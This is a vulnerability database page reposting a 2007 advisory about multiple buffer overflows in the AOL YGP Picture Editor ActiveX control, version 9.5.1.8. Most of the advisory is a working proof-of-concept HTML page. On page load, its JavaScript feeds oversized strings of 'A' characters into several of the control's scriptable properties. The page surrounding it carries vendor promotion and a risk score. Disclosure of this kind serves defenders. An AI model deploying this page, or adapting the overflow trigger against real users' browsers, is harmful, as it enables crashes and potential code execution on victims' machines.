Lucene search

aolygp-overflows.txt

🗓️ 28 Dec 2007 00:00:00Reported by Elazar BroadType

packetstorm🔗 packetstormsecurity.com👁 21 Views

The AOL YGP Picture Editor Control version 9.5.1.8 suffers from multiple buffer overflows in various properties, making it exploitable through scripting. PoC demonstrates the exploit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:  
  
----------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 8175) s = s + 'A';  
  
  
obj.DisplayName = s;  
obj.DisplayName = s;  
obj.FinalSavePath = s;  
obj.ForceSaveTo = s;  
obj.HiddenControls = s;  
obj.InitialEditorScreen = s;  
obj.Locale = s;  
obj.Proxy = s;  
obj.UserAgent = s;  
  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">  
</object>  
</body>  
</html>  
----------------  
  
Happy Holidays to all!  
  
Elazar  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Dec 2007 00:00Current

7.4High risk

Vulners AI Score7.4